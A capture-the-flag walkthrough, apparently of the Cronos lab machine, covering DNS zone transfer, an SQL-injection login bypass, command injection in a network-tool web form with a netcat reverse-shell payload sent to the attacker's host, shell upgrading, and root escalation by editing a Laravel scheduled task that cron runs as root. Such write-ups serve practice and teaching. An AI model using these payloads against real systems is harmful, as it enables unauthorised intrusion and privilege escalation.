Enumeration
1. Nmap
nmap -sV -oA nmap-out 10.10.10.13
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
So, we are dealing with an Ubuntu machine that is hosting a WebApp. Port 53 is also open and an ISC BIND service running on it. Let’s research on it a little bit more.
[ISC Bind 9](https://www.isc.org/bind/) has evolved to be a very flexible, full-featured DNS system. Whatever your application is, BIND 9 probably has the required features. As the first, oldest, and most commonly deployed solution, there are more network engineers who are already familiar with BIND 9 than with any other system.
I was having problems connecting to the web service so I added the IP (10.10.10.13) to the /etc/hosts file with the name cronos.htb.
2. DNS Enumeration
Check out the video from hackersploit and learn about dns enumeration and zone transfers to understand the following lines.
$ dig axfr @10.10.10.13 cronos.htb
; <<>> DiG 9.16.2-Debian <<>> axfr @10.10.10.13 cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb. 604800 IN NS ns1.cronos.htb.
cronos.htb. 604800 IN A 10.10.10.13
admin.cronos.htb. 604800 IN A 10.10.10.13
ns1.cronos.htb. 604800 IN A 10.10.10.13
www.cronos.htb. 604800 IN A 10.10.10.13
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 28 msec
;; SERVER: 10.10.10.13#53(10.10.10.13)
;; WHEN: Tue Apr 13 07:09:07 UTC 2021
;; XFR size: 7 records (messages 1, bytes 203)
I have found a couple of domains linked to cronos. Let’s add them to the /etc/hosts file too in order to access them on the browser.
Admin.cronos.htb & SQLi
By going to admin.cronos.htb , a login page was displayed.
An innocent SQLi check let’s us in.
Two tools are running on the welcome.php page. Ping and traceroute. From Burp, I have poked the application and discovered command injection.
Request
POST /welcome.php HTTP/1.1
Host: admin.cronos.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: http://admin.cronos.htb
DNT: 1
Connection: close
Referer: http://admin.cronos.htb/welcome.php
Cookie: PHPSESSID=huubsof4d0e5ged45ge0gflp26
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
command=traceroute&host=8.8.8.8%3Bls+.
I have encoded a semicolon and added the ls command for the current directory.
Response
HTTP/1.1 200 OK
Date: Tue, 13 Apr 2021 08:01:47 GMT
Server: Apache/2.4.18 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 527
Connection: close
Content-Type: text/html; charset=UTF-8
<html">
<head>
<title>Net Tool v0.1 </title>
</head>
<body>
<h1>Net Tool v0.1</h1>
<form method="POST" action="">
<select name="command">
<option value="traceroute">traceroute</option>
<option value="ping -c 1">ping</option>
</select>
<input type="text" name="host" value="8.8.8.8"/>
<input type="submit" value="Execute!"/>
</form>
config.php<br>
index.php<br>
logout.php<br>
session.php<br>
welcome.php<br>
<p><a href = "logout.php">Sign Out</a></p>
</body>
</html>
So, we now know there is a command injection vulnerability. Let’s see if we could locate netcat in order to connect to the victim host.
Request
<deleted>
Referer: http://admin.cronos.htb/welcome.php
Cookie: PHPSESSID=huubsof4d0e5ged45ge0gflp26
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
command=traceroute&host=8.8.8.8%3Blocate+nc
Response
<deleted>
cute!"/>
</form>
/bin/loginctl<br>
/bin/nc<br>
/bin/nc.openbsd<br>
</deleted>
There is a netcat binary on the machine. Let’s try to use it to our advantage.
Referer: http://admin.cronos.htb/welcome.php
Cookie: PHPSESSID=huubsof4d0e5ged45ge0gflp26
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
command=traceroute&host=8.8.8.8%3Bnc+10.10.14.2+1234+-e+/bin/bash
nc 10.10.14.2 1234 -e /bin/bash was unsuccessful. Perhaps an URI encoding problem?
Check out this Reverse Shell Cheat Sheet
After trying some of the shells, finally the python2.7 one, done did it again! And we have a shell as www-data.
# nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.13] 51718
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
After running sudo -l I was receiving no tty present. So I tried to upgrade my shell:
$ sudo -l
sudo: no tty present and no askpass program specified
$ python -c 'import pty;pty.spawn("/bin/bash")'
[email protected]:/home/noulis$ export TERM=xterm-256color
export TERM=xterm-256color
[email protected]:/home/noulis$ ^Z
[1]+ Stopped nc -nlvp 1234
# stty raw -echo
# fg
[1]+ Started nc -nlvp 1234
[email protected]:/home/noulis$ stty rows 25 columns 237
[email protected]:/home/noulis$ whoami
www-data
[email protected]:/home/noulis$ sudo -l
[sudo] password for www-data:
Sorry, try again.
Now that it works as expected. Let’s move on to:
Privesc
Crontab is a task scheduler in linux systems. It is usually the very first thing I check when doing linux boxes. To check if there are any scheduled tasks, I have “catted” the /etc/crontab file:
$ cat /etc/crontab
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
It seems root is running a php file artisan from within /var/www/laravel/. Let’s see what this file is and what it does.
$ cat artisan
#!/usr/bin/env php
<?php
/*
|--------------------------------------------------------------------------
| Register The Auto Loader
|--------------------------------------------------------------------------
|
| Composer provides a convenient, automatically generated class loader
| for our application. We just need to utilize it! We'll require it
| into the script here so that we do not have to worry about the
| loading of any our classes "manually". Feels great to relax.
|
*/
require __DIR__.'/bootstrap/autoload.php';
$app = require_once __DIR__.'/bootstrap/app.php';
/*
|--------------------------------------------------------------------------
| Run The Artisan Application
|--------------------------------------------------------------------------
|
| When we run the console application, the current CLI command will be
| executed in this console and the response sent back to a terminal
| or another output device for the developers. Here goes nothing!
|
*/
$kernel = $app->make(Illuminate\Contracts\Console\Kernel::class);
$status = $kernel->handle(
$input = new Symfony\Component\Console\Input\ArgvInput,
new Symfony\Component\Console\Output\ConsoleOutput
);
/*
|--------------------------------------------------------------------------
| Shutdown The Application
|--------------------------------------------------------------------------
|
| Once Artisan has finished running. We will fire off the shutdown events
| so that any final work may be done by the application before we shut
| down the process. This is the last thing to happen to the request.
|
*/
$kernel->terminate($input, $status);
exit($status);
[email protected]:/var/www/laravel$
So any command that is inserted from the CLI will be executed in this console as root. I need more information about that tho.
After a while of poking around artisan commands, I have found this website that sheds light about:
Scheduling Shell Commands
The exec method may be used to issue a command to the operating system:
$schedule->exec('node /home/forge/script.js')->daily();
Finally, to gain the root flag, I am copying the root.txt file to tmp, changing its ownership from root to www-data (me), and assigning it permissions in order to be accessible.
protected function schedule(Schedule $schedule)
{
$schedule->exec('cp /root/root.txt /tmp/;chown www-data:www-data /tmp/root.txt; chmod 4755 /tmp/root.txt')->everyMinute();
// $schedule->command('inspire')
// ->hourly();
}
A minute later, we have a root.txt with the following permissions in /tmp/:
$ ls -la
total 40
drwxrwxrwt 9 root root 4096 Apr 13 15:17 .
drwxr-xr-x 23 root root 4096 Apr 9 2017 ..
drwxrwxrwt 2 root root 4096 Apr 13 14:28 .ICE-unix
drwxrwxrwt 2 root root 4096 Apr 13 14:28 .Test-unix
drwxrwxrwt 2 root root 4096 Apr 13 14:28 .X11-unix
drwxrwxrwt 2 root root 4096 Apr 13 14:28 .XIM-unix
drwxrwxrwt 2 root root 4096 Apr 13 14:28 .font-unix
-rw-r--r-- 1 root root 0 Apr 13 15:11 catted.txt
-rwsr-xr-x 1 www-data www-data 33 Apr 13 15:17 root.txt
drwx------ 3 root root 4096 Apr 13 14:28 systemd-private-162edecf88ca4801b7de1bd826d2c653-systemd-timesyncd.service-JYRg0U
drwx------ 2 root root 4096 Apr 13 14:28 vmware-root
Try smarter, not harder. 